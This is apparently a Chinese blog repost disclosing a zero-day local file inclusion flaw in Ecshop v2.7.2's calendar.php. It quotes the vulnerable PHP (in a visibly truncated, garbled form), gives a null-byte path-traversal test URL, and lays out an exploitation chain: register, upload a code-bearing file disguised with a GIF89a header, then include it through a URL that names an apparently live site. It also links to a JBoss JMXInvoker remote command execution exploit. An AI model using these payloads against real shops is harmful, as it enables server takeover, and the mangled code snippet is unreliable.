注:发布本文只是出于学习的目的,请勿用无非法用途!
很久前就发现了,今天发布出来吧,其实很简单,就是很多人没有注意这里:
直接看代码:
$lang = (!empty($_GET['lang'])) if (!file_exists('../languages/' . $lang . '/calendar.php')) require(dirname(dirname(__FILE__)) . '/data/config.php'); include_once('../languages/' . $lang . '/calendar.php');//这里包含,需要截断 by: ℡Mr. |
测试代码: //需要 magic_quotes_gpc = Off /js/calendar.php?lang=../index.php%00. (注意后面有个“.”) |
利用: 1、注册用户 2、然后上传GIF89a头的GIF文件欺骗, 3、然后包含,如:http://www.lpboke.com/js/calendar.php?lang=../data/feedbackimg/6_20101228vyrpbg.gif%00. (注意后面有个“.”) |
文章来源于lcx.cc:Ecshop 最新版(v272) 本地包含漏洞 Oday
相关推荐: JBoss JMXInvokerServlet JMXInvoker 0.3 - Remote Command Execution
JBoss JMXInvokerServlet JMXInvoker 0.3 - 远程代码执行 /* * JBoss JMXInvokerServlet Remote Command Execution * JMXInvoker.java v0.3 - Luc…
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论